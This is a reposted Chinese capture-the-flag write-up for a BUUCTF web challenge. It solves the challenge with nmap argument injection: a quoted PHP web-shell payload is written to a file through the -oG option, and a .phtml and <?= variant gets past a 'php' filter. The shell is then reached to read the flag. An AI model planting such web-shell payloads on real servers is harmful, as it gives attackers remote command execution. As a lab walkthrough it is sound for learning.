web buuctf [网鼎杯 2020 朱雀组]Nmap1

编程入门 行业动态 更新时间:2024-10-07 05:29:58

web <a href=https://www.elefans.com/category/jswz/34/1765501.html style=buuctf [网鼎杯 2020 朱雀组]Nmap1"/>

web buuctf [网鼎杯 2020 朱雀组]Nmap1

考点:namp注入

参考web buuctf [BUUCTF 2018]Online Tool1_半杯雨水敬过客的博客-CSDN博客

1.

 2.利用NMAP里的-oG命令实现代码的写入,那我们这里就可以尝试构造payload,来利用‘拼接,写入我们想要的shell文件

我们直接用那道buu里的payload:

' <?php eval($_POST["cmd"]);?> -oG zhuque.php '

注入之后发现存在过滤,fuzz,过滤了php

(1)利用<?=来代替<?php进行绕过
(2)利用phtml来代替shell.php的文件后缀

payload:

' <?= eval($_POST["cmd"]);?> -oG zhuque.phtml '

 上传成功

3.打开蚁剑

 在根目录下找到flag

 flag{fb8e3637-ac42-456c-8caf-d1470e670fe5}

更多推荐

web buuctf [网鼎杯 2020 朱雀组]Nmap1

本文发布于:2024-02-07 04:50:43,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/1753665.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:朱雀   buuctf   web   网鼎杯

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!